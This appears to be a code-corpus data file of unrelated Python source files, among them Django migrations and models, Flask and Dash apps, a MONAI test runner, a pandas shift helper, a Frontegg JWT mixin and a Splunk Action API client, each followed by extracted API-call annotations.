[((37, 28, 37, 58), 'skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub', 'ManagementServiceStub', ({(37, 50, 37, 57): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub\n'), ((47, 8, 51, 9), 'skywalking.loggings.logger.debug', 'logger.debug', ({(48, 12, 48, 45): '"""service heart beats, [%s], [%s]"""', (49, 12, 49, 31): 'config.service_name', (50, 12, 50, 35): 'config.service_instance'}, {}), "('service heart beats, [%s], [%s]', config.service_name, config\n .service_instance)", False, 'from skywalking.loggings import logger\n'), ((60, 27, 60, 65), 'skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub', 'TraceSegmentReportServiceStub', ({(60, 57, 60, 64): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub\n'), ((68, 27, 68, 56), 'skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub', 'LogReportServiceStub', ({(68, 48, 68, 55): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub\n'), ((76, 25, 76, 49), 'skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub', 'ProfileTaskStub', ({(76, 41, 76, 48): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub\n'), ((87, 8, 87, 49), 'skywalking.command.command_service.receive_command', 'command_service.receive_command', ({(87, 40, 87, 48): 'commands'}, {}), '(commands)', False, 'from skywalking.command import command_service\n'), ((52, 36, 55, 9), 'skywalking.protocol.management.Management_pb2.InstancePingPkg', 'InstancePingPkg', (), '', False, 'from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties\n'), ((83, 28, 83, 89), 'skywalking.profile.profile_task_execution_service.get_last_command_create_time', 'profile_task_execution_service.get_last_command_create_time', ({}, {}), '()', False, 'from skywalking.profile import profile_task_execution_service\n'), ((43, 24, 43, 74), 'skywalking.protocol.common.Common_pb2.KeyStringValuePair', 'KeyStringValuePair', (), '', False, 'from skywalking.protocol.common.Common_pb2 import KeyStringValuePair\n')]
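A hedged sketch of wiring the gRPC clients above to a collector over an insecure channel; the backend address is an example, and config.service_name / config.service_instance are assumed to be populated elsewhere by the agent.

import grpc
from skywalking.client.grpc import GrpcServiceManagementClient

channel = grpc.insecure_channel("127.0.0.1:11800")    # OAP backend address (example)
management = GrpcServiceManagementClient(channel)
management.send_instance_props()   # report instance properties once
management.send_heart_beat()       # then ping periodically to keep the instance alive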
glitzybunny/coingate_sandbox_payment
coingate/migrations/0004_auto_20200207_1959.py
f5686964cdd6b7d65f9f37957da4b2cda6a02f63
# Generated by Django 3.0.3 on 2020-02-07 19:59 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('coingate', '0003_auto_20200207_1513'), ] operations = [ migrations.RemoveField( model_name='payment', name='token', ), migrations.AddField( model_name='payment', name='expire_at', field=models.DateTimeField(blank=True, null=True), ), migrations.AddField( model_name='payment', name='pay_amount', field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True), ), migrations.AddField( model_name='payment', name='payment_address', field=models.CharField(blank=True, max_length=100, null=True), ), migrations.AlterField( model_name='payment', name='created_at', field=models.DateTimeField(auto_now_add=True, null=True), ), migrations.AlterField( model_name='payment', name='price_currency', field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10), ), migrations.AlterField( model_name='payment', name='receive_currency', field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10), ), migrations.AlterField( model_name='payment', name='status', field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10), ), ]
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((20, 18, 20, 61), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((25, 18, 25, 93), 'django.db.models.DecimalField', 'models.DecimalField', (), '', False, 'from django.db import migrations, models\n'), ((30, 18, 30, 73), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((35, 18, 35, 68), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((40, 18, 40, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((45, 18, 45, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((50, 18, 50, 325), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')]
SpaceTeam/space-event-trace
space_trace/__init__.py
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
import toml from flask import Flask from flask_sqlalchemy import SQLAlchemy app = Flask(__name__, instance_relative_config=True) app.config.from_file("config.toml", load=toml.load) db = SQLAlchemy(app) @app.before_first_request def create_table(): db.create_all() from space_trace import views, cli
[((6, 6, 6, 52), 'flask.Flask', 'Flask', (), '', False, 'from flask import Flask\n'), ((8, 5, 8, 20), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ({(8, 16, 8, 19): 'app'}, {}), '(app)', False, 'from flask_sqlalchemy import SQLAlchemy\n')]
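The app factory above loads config.toml from the Flask instance folder via app.config.from_file. A minimal sketch of creating such a file, assuming the default instance folder next to the package; the keys are the usual Flask / Flask-SQLAlchemy ones and the values are placeholders:

from pathlib import Path

Path("instance").mkdir(exist_ok=True)
Path("instance/config.toml").write_text(
    'SECRET_KEY = "change-me"\n'
    'SQLALCHEMY_DATABASE_URI = "sqlite:///space_trace.sqlite"\n'
)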
forons/noise-generator
ng/distributions/Distribution.py
033906165adaf6e620c03bf0b91f19b6d9890cf0
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import logging from enum import Enum from .NormalDist import NormalDist from .UniformDist import UniformDist class Distribution(Enum): UNIFORM = 0 GAUSSIAN = 1 POISSON = 2 @staticmethod def determine_distribution(distribution, distribution_params): distribution_upper = distribution.upper() if distribution_upper not in Distribution.__members__: raise IndexError('Distribution not supported `{}`. Try one of: {}'.format( distribution, [(elem.value, elem.name) for elem in Distribution])) if Distribution[distribution_upper] == Distribution.UNIFORM: if not distribution_params: distribution_params = 0.5 return UniformDist(rate=float(distribution_params)) if Distribution[distribution_upper] == Distribution.GAUSSIAN: if not distribution_params: distribution_params = [0., 1.] return NormalDist(loc=float(distribution_params[0]), scale=float(distribution_params[1])) if Distribution[distribution_upper] is Distribution.POISSON: pass raise IndexError('Distribution not supported `{}`. Try one of: {}'.format( distribution, [(elem.value, elem.name) for elem in Distribution]))
[]
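Example use of the factory above; the import path follows this record's repo_path, and the behaviour of UniformDist / NormalDist comes from the sibling modules, so both are assumptions here.

from ng.distributions.Distribution import Distribution

uniform = Distribution.determine_distribution("uniform", 0.3)          # UniformDist(rate=0.3)
gaussian = Distribution.determine_distribution("gaussian", ["0", "2"])  # NormalDist(loc=0.0, scale=2.0)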
Riteme/test
test/rename.py
b511d6616a25f4ae8c3861e2029789b8ee4dcb8d
import os import sys filename = sys.argv[1] from_id = int(sys.argv[2]) to_id = int(sys.argv[3]) for i in range(from_id, to_id + 1): os.system("mv {0}.in{1} {0}{1}.in".format(filename, i)) os.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
[]
Savior-19/Savior19
TransitPass/urls.py
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
from django.urls import path from . import views urlpatterns = [ path('apply/', views.FillPassApplication, name='transit-pass-application-form'), path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'), path('view-application-list/', views.DisplayApplicationList, name='view-application-list'), path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'), path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'), path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'), ]
[((6, 4, 6, 83), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((8, 4, 8, 105), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((10, 4, 10, 94), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((12, 4, 12, 116), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((14, 4, 14, 100), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((16, 4, 16, 85), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n')]
kozo2/dash-docs
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py
5140cfd1fda439233e8b95e2443332a32a2453f5
import dash from dash.dependencies import Input, Output import dash_html_components as html import dash_core_components as dcc app = dash.Dash(__name__) app.layout = html.Div([ dcc.Textarea( id='textarea-example', value='Textarea content initialized\nwith multiple lines of text', style={'width': '100%', 'height': 300}, ), html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'}) ]) @app.callback( Output('textarea-example-output', 'children'), [Input('textarea-example', 'value')] ) def update_output(value): return 'You have entered: \n{}'.format(value) if __name__ == '__main__': app.run_server(debug=True)
[((6, 6, 6, 25), 'dash.Dash', 'dash.Dash', ({(6, 16, 6, 24): '__name__'}, {}), '(__name__)', False, 'import dash\n'), ((18, 4, 18, 49), 'dash.dependencies.Output', 'Output', ({(18, 11, 18, 36): '"""textarea-example-output"""', (18, 38, 18, 48): '"""children"""'}, {}), "('textarea-example-output', 'children')", False, 'from dash.dependencies import Input, Output\n'), ((9, 4, 13, 5), 'dash_core_components.Textarea', 'dcc.Textarea', (), '', True, 'import dash_core_components as dcc\n'), ((14, 4, 14, 76), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((19, 5, 19, 39), 'dash.dependencies.Input', 'Input', ({(19, 11, 19, 29): '"""textarea-example"""', (19, 31, 19, 38): '"""value"""'}, {}), "('textarea-example', 'value')", False, 'from dash.dependencies import Input, Output\n')]
balexander85/wrapped_driver
tests/test_wrapped_driver.py
2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1
import pytest from selenium.common.exceptions import WebDriverException from wrapped_driver import WrappedDriver def test_empty_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(WebDriverException): WrappedDriver(executable_path="", headless=True) def test_no_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(TypeError): WrappedDriver(headless=True)
[((9, 9, 9, 42), 'pytest.raises', 'pytest.raises', ({(9, 23, 9, 41): 'WebDriverException'}, {}), '(WebDriverException)', False, 'import pytest\n'), ((10, 8, 10, 56), 'wrapped_driver.WrappedDriver', 'WrappedDriver', (), '', False, 'from wrapped_driver import WrappedDriver\n'), ((15, 9, 15, 33), 'pytest.raises', 'pytest.raises', ({(15, 23, 15, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((16, 8, 16, 36), 'wrapped_driver.WrappedDriver', 'WrappedDriver', (), '', False, 'from wrapped_driver import WrappedDriver\n')]
ggs134/py-evm
eth/vm/forks/petersburg/blocks.py
5ad87356181b03c14a2452131f50fe8762127c84
from rlp.sedes import ( CountableList, ) from eth.rlp.headers import ( BlockHeader, ) from eth.vm.forks.byzantium.blocks import ( ByzantiumBlock, ) from .transactions import ( PetersburgTransaction, ) class PetersburgBlock(ByzantiumBlock): transaction_builder = PetersburgTransaction fields = [ ('header', BlockHeader), ('transactions', CountableList(transaction_builder)), ('uncles', CountableList(BlockHeader)) ]
[((20, 25, 20, 59), 'rlp.sedes.CountableList', 'CountableList', ({(20, 39, 20, 58): 'transaction_builder'}, {}), '(transaction_builder)', False, 'from rlp.sedes import CountableList\n'), ((21, 19, 21, 45), 'rlp.sedes.CountableList', 'CountableList', ({(21, 33, 21, 44): 'BlockHeader'}, {}), '(BlockHeader)', False, 'from rlp.sedes import CountableList\n')]
crnbaker/MONAI
tests/runner.py
a4b1144efdc27b197410033ae08bd587c8a1634a
# Copyright 2020 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import inspect import os import sys import time import unittest from monai.utils import PerfContext results: dict = dict() class TimeLoggingTestResult(unittest.TextTestResult): """Overload the default results so that we can store the results.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.timed_tests = dict() def startTest(self, test): # noqa: N802 """Start timer, print test name, do normal test.""" self.start_time = time.time() name = self.getDescription(test) self.stream.write(f"Starting test: {name}...\n") super().startTest(test) def stopTest(self, test): # noqa: N802 """On test end, get time, print, store and do normal behaviour.""" elapsed = time.time() - self.start_time name = self.getDescription(test) self.stream.write(f"Finished test: {name} ({elapsed:.03}s)\n") if name in results: raise AssertionError("expected all keys to be unique") results[name] = elapsed super().stopTest(test) def print_results(results, discovery_time, thresh, status): # only keep results >= threshold results = dict(filter(lambda x: x[1] > thresh, results.items())) if len(results) == 0: return print(f"\n\n{status}, printing completed times >{thresh}s in ascending order...\n") timings = dict(sorted(results.items(), key=lambda item: item[1])) for r in timings: if timings[r] >= thresh: print(f"{r} ({timings[r]:.03}s)") print(f"test discovery time: {discovery_time:.03}s") print(f"total testing time: {sum(results.values()):.03}s") print("Remember to check above times for any errors!") def parse_args(default_pattern): parser = argparse.ArgumentParser(description="Runner for MONAI unittests with timing.") parser.add_argument( "-s", action="store", dest="path", default=".", help="Directory to start discovery (default: '%(default)s')" ) parser.add_argument( "-p", action="store", dest="pattern", default=default_pattern, help="Pattern to match tests (default: '%(default)s')", ) parser.add_argument( "-t", "--thresh", dest="thresh", default=10.0, type=float, help="Display tests longer than given threshold (default: %(default)d)", ) parser.add_argument( "-v", "--verbosity", action="store", dest="verbosity", type=int, default=1, help="Verbosity level (default: %(default)d)", ) parser.add_argument("-q", "--quick", action="store_true", dest="quick", default=False, help="Only do quick tests") parser.add_argument( "-f", "--failfast", action="store_true", dest="failfast", default=False, help="Stop testing on first failure" ) args = parser.parse_args() print(f"Running tests in folder: '{args.path}'") if args.pattern: print(f"With file pattern: '{args.pattern}'") return args def get_default_pattern(loader): signature = inspect.signature(loader.discover) params = {k: v.default for k, v in signature.parameters.items() if v.default is not inspect.Parameter.empty} return params["pattern"] if __name__ == "__main__": loader = unittest.TestLoader() default_pattern = get_default_pattern(loader) # Parse input arguments args = 
parse_args(default_pattern) # If quick is desired, set environment variable if args.quick: os.environ["QUICKTEST"] = "True" # Get all test names (optionally from some path with some pattern) with PerfContext() as pc: tests = loader.discover(args.path, args.pattern) discovery_time = pc.total_time print(f"time to discover tests: {discovery_time}s") test_runner = unittest.runner.TextTestRunner( resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast ) # Use try catches to print the current results if encountering exception or keyboard interruption try: test_result = test_runner.run(tests) print_results(results, discovery_time, args.thresh, "tests finished") sys.exit(not test_result.wasSuccessful()) except KeyboardInterrupt: print_results(results, discovery_time, args.thresh, "tests cancelled") sys.exit(1) except Exception: print_results(results, discovery_time, args.thresh, "exception reached") raise
[((66, 13, 66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((107, 16, 107, 50), 'inspect.signature', 'inspect.signature', ({(107, 34, 107, 49): 'loader.discover'}, {}), '(loader.discover)', False, 'import inspect\n'), ((114, 13, 114, 34), 'unittest.TestLoader', 'unittest.TestLoader', ({}, {}), '()', False, 'import unittest\n'), ((130, 18, 132, 5), 'unittest.runner.TextTestRunner', 'unittest.runner.TextTestRunner', (), '', False, 'import unittest\n'), ((33, 26, 33, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((125, 9, 125, 22), 'monai.utils.PerfContext', 'PerfContext', ({}, {}), '()', False, 'from monai.utils import PerfContext\n'), ((40, 18, 40, 29), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((141, 8, 141, 19), 'sys.exit', 'sys.exit', ({(141, 17, 141, 18): '(1)'}, {}), '(1)', False, 'import sys\n')]
arnoyu-hub/COMP0016miemie
venv/Lib/site-packages/pandas/core/array_algos/transforms.py
59af664dcf190eab4f93cefb8471908717415fea
""" transforms.py is for shape-preserving functions. """ import numpy as np def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray: new_values = values if periods == 0 or values.size == 0: return new_values.copy() # make sure array sent to np.roll is c_contiguous f_ordered = values.flags.f_contiguous if f_ordered: new_values = new_values.T axis = new_values.ndim - axis - 1 if new_values.size: new_values = np.roll( new_values, np.intp(periods), axis=axis, ) axis_indexer = [slice(None)] * values.ndim if periods > 0: axis_indexer[axis] = slice(None, periods) else: axis_indexer[axis] = slice(periods, None) new_values[tuple(axis_indexer)] = fill_value # restore original order if f_ordered: new_values = new_values.T return new_values
[((23, 12, 23, 28), 'numpy.intp', 'np.intp', ({(23, 20, 23, 27): 'periods'}, {}), '(periods)', True, 'import numpy as np\n')]
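A minimal usage sketch (not part of the file above) showing what shift() does to a 2-D array; it assumes the internal module path shown in this row is importable, which can change between pandas versions.

import numpy as np
from pandas.core.array_algos.transforms import shift  # internal pandas API

values = np.arange(6, dtype=float).reshape(2, 3)   # [[0, 1, 2], [3, 4, 5]]
shifted = shift(values, periods=1, axis=1, fill_value=np.nan)
# Each row is shifted one position to the right and the vacated slot is filled:
# [[nan, 0., 1.],
#  [nan, 3., 4.]]
print(shifted)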
Stanislav-Rybonka/studentsdb
students/models/group.py
efb1440db4ec640868342a5f74cd48784268781f
from __future__ import unicode_literals from django.db import models from django.utils.translation import ugettext as _ class Group(models.Model): """ Group model """ title = models.CharField(max_length=256, blank=False, verbose_name=_('Name')) leader = models.OneToOneField( 'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL) notes = models.TextField(blank=True, verbose_name=_('Additional notices')) class Meta(object): verbose_name = _('Group') verbose_name_plural = _('Groups') def __str__(self): if self.leader: return '{} ({} {})'.format( self.title, self.leader.first_name, self.leader.last_name) else: return '{}'.format(None)
[((18, 23, 18, 33), 'django.utils.translation.ugettext', '_', ({(18, 25, 18, 32): '"""Group"""'}, {}), "('Group')", True, 'from django.utils.translation import ugettext as _\n'), ((19, 30, 19, 41), 'django.utils.translation.ugettext', '_', ({(19, 32, 19, 40): '"""Groups"""'}, {}), "('Groups')", True, 'from django.utils.translation import ugettext as _\n'), ((12, 71, 12, 80), 'django.utils.translation.ugettext', '_', ({(12, 73, 12, 79): '"""Name"""'}, {}), "('Name')", True, 'from django.utils.translation import ugettext as _\n'), ((14, 32, 14, 43), 'django.utils.translation.ugettext', '_', ({(14, 34, 14, 42): '"""Leader"""'}, {}), "('Leader')", True, 'from django.utils.translation import ugettext as _\n'), ((15, 54, 15, 77), 'django.utils.translation.ugettext', '_', ({(15, 56, 15, 76): '"""Additional notices"""'}, {}), "('Additional notices')", True, 'from django.utils.translation import ugettext as _\n')]
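A hypothetical Django-shell sketch (not from the repository) of creating a Group with the model above; it assumes the students app is installed and migrated. Note that __str__ falls back to formatting None when no leader is set.

from students.models.group import Group

# Leader is optional (null=True), so a group can be created without one.
group = Group.objects.create(title='CS-101', notes='First-year cohort')
print(str(group))  # prints 'None': __str__ formats None whenever leader is unset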
pinikeizman/python-sdk
frontegg/baseConfig/identity_mixin.py
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
from abc import ABCMeta, abstractmethod from frontegg.helpers.frontegg_urls import frontegg_urls import typing import jwt import requests from frontegg.helpers.logger import logger from jwt import InvalidTokenError class IdentityClientMixin(metaclass=ABCMeta): __publicKey = None @property @abstractmethod def vendor_session_request(self) -> requests.Session: pass @property @abstractmethod def should_refresh_vendor_token(self) -> bool: pass @abstractmethod def refresh_vendor_token(self) -> None: pass def get_public_key(self) -> str: if self.__publicKey: return self.__publicKey logger.info('could not find public key locally, will fetch public key') reties = 0 while reties < 10: try: self.__publicKey = self.fetch_public_key() return self.__publicKey except Exception as e: reties = reties + 1 logger.error( 'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e)) logger.error('failed to get public key in all retries') def fetch_public_key(self) -> str: if self.should_refresh_vendor_token: self.refresh_vendor_token() response = self.vendor_session_request.get( frontegg_urls.identity_service['vendor_config']) response.raise_for_status() data = response.json() return data.get('publicKey') def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True): if not authorization_header: raise InvalidTokenError('Authorization headers is missing') logger.debug('found authorization header: ' + str(authorization_header)) jwt_token = authorization_header.replace('Bearer ', '') if verify: public_key = self.get_public_key() logger.debug('got public key' + str(public_key)) decoded = jwt.decode(jwt_token, public_key, algorithms='RS256') else: decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False) logger.info('jwt was decoded successfully') logger.debug('JWT value - ' + str(decoded)) return decoded
[((31, 8, 31, 79), 'frontegg.helpers.logger.logger.info', 'logger.info', ({(31, 20, 31, 78): '"""could not find public key locally, will fetch public key"""'}, {}), "('could not find public key locally, will fetch public key')", False, 'from frontegg.helpers.logger import logger\n'), ((42, 8, 42, 63), 'frontegg.helpers.logger.logger.error', 'logger.error', ({(42, 21, 42, 62): '"""failed to get public key in all retries"""'}, {}), "('failed to get public key in all retries')", False, 'from frontegg.helpers.logger import logger\n'), ((68, 8, 68, 51), 'frontegg.helpers.logger.logger.info', 'logger.info', ({(68, 20, 68, 50): '"""jwt was decoded successfully"""'}, {}), "('jwt was decoded successfully')", False, 'from frontegg.helpers.logger import logger\n'), ((57, 18, 57, 71), 'jwt.InvalidTokenError', 'InvalidTokenError', ({(57, 36, 57, 70): '"""Authorization headers is missing"""'}, {}), "('Authorization headers is missing')", False, 'from jwt import InvalidTokenError\n'), ((64, 22, 64, 75), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((66, 22, 66, 77), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n')]
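A hypothetical sketch (not part of the SDK) of decoding a token without signature verification through the mixin above, using a minimal concrete subclass; it assumes PyJWT < 2.0, which is the API that the mixin's verify=False keyword targets.

import jwt
import requests
from frontegg.baseConfig.identity_mixin import IdentityClientMixin

class StaticIdentityClient(IdentityClientMixin):
    """Minimal concrete subclass: never refreshes the vendor token."""

    @property
    def vendor_session_request(self) -> requests.Session:
        return requests.Session()

    @property
    def should_refresh_vendor_token(self) -> bool:
        return False

    def refresh_vendor_token(self) -> None:
        return None

# Mint a throwaway token purely for the demonstration, then decode it unverified.
token = jwt.encode({'sub': 'user-1'}, 'local-secret', algorithm='HS256')
if isinstance(token, bytes):  # PyJWT 1.x returns bytes
    token = token.decode()
claims = StaticIdentityClient().decode_jwt('Bearer ' + token, verify=False)
print(claims)  # -> {'sub': 'user-1'}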
ianlee4/splunk-cloud-sdk-python
splunk_sdk/action/v1beta2/gen_action_service_api.py
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
# coding: utf-8 # Copyright © 2021 Splunk, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"): you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # [http://www.apache.org/licenses/LICENSE-2.0] # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. ############# This file is auto-generated. Do not edit! ############# """ SDC Service: Action Service With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions. OpenAPI spec version: v1beta2.12 (recommended default) Generated by: https://openapi-generator.tech """ from requests import Response from string import Template from typing import List, Dict from splunk_sdk.base_client import handle_response from splunk_sdk.base_service import BaseService from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel from splunk_sdk.action.v1beta2.gen_models import Action from splunk_sdk.action.v1beta2.gen_models import ActionMutable from splunk_sdk.action.v1beta2.gen_models import ActionResult from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey from splunk_sdk.action.v1beta2.gen_models import ServiceError from splunk_sdk.action.v1beta2.gen_models import TriggerEvent class ActionService(BaseService): """ Action Service Version: v1beta2.12 With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions. """ def __init__(self, base_client): super().__init__(base_client) def create_action(self, action: Action, query_params: Dict[str, object] = None) -> Action: """ Creates an action template. """ if query_params is None: query_params = {} path_params = { } path = Template("/action/v1beta2/actions").substitute(path_params) url = self.base_client.build_url(path) data = action.to_dict() response = self.base_client.post(url, json=data, params=query_params) return handle_response(response, Action) def delete_action(self, action_name: str, query_params: Dict[str, object] = None) -> SSCVoidModel: """ Removes an action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.delete(url, params=query_params) return handle_response(response, ) def get_action(self, action_name: str, query_params: Dict[str, object] = None) -> Action: """ Returns a specific action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, Action) def get_action_status(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> ActionResult: """ Returns the status of an action that was invoked. The status is available for 4 days after the last status change. 
""" if query_params is None: query_params = {} path_params = { "action_name": action_name, "status_id": status_id, } path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, ActionResult) def get_action_status_details(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> List[ActionResultEmailDetail]: """ Returns the status details of the invoked email action. The status is available for 4 days after the last status change. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, "status_id": status_id, } path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}/details").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, ActionResultEmailDetail) def get_public_webhook_keys(self, query_params: Dict[str, object] = None) -> List[PublicWebhookKey]: """ Returns an array of one or two webhook keys. The first key is active. The second key, if present, is expired. """ if query_params is None: query_params = {} path_params = { } path = Template("/system/action/v1beta2/webhook/keys").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, PublicWebhookKey) def list_actions(self, query_params: Dict[str, object] = None) -> List[Action]: """ Returns the list of action templates. """ if query_params is None: query_params = {} path_params = { } path = Template("/action/v1beta2/actions").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, Action) def trigger_action(self, action_name: str, trigger_event: TriggerEvent, query_params: Dict[str, object] = None) -> SSCVoidModel: """ Invokes an action. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) data = trigger_event.to_dict() response = self.base_client.post(url, json=data, params=query_params) return handle_response(response, ) def update_action(self, action_name: str, action_mutable: ActionMutable, query_params: Dict[str, object] = None) -> Action: """ Modifies an action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) data = action_mutable.to_dict() response = self.base_client.patch(url, json=data, params=query_params) return handle_response(response, Action)
[((70, 15, 70, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(70, 31, 70, 39): 'response', (70, 41, 70, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((86, 15, 86, 42), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(86, 31, 86, 39): 'response'}, {}), '(response)', False, 'from splunk_sdk.base_client import handle_response\n'), ((102, 15, 102, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(102, 31, 102, 39): 'response', (102, 41, 102, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((119, 15, 119, 54), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(119, 31, 119, 39): 'response', (119, 41, 119, 53): 'ActionResult'}, {}), '(response, ActionResult)', False, 'from splunk_sdk.base_client import handle_response\n'), ((136, 15, 136, 65), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(136, 31, 136, 39): 'response', (136, 41, 136, 64): 'ActionResultEmailDetail'}, {}), '(response, ActionResultEmailDetail)', False, 'from splunk_sdk.base_client import handle_response\n'), ((151, 15, 151, 58), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(151, 31, 151, 39): 'response', (151, 41, 151, 57): 'PublicWebhookKey'}, {}), '(response, PublicWebhookKey)', False, 'from splunk_sdk.base_client import handle_response\n'), ((166, 15, 166, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(166, 31, 166, 39): 'response', (166, 41, 166, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((183, 15, 183, 42), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(183, 31, 183, 39): 'response'}, {}), '(response)', False, 'from splunk_sdk.base_client import handle_response\n'), ((200, 15, 200, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(200, 31, 200, 39): 'response', (200, 41, 200, 47): 'Action'}, {}), '(response, Action)', False, 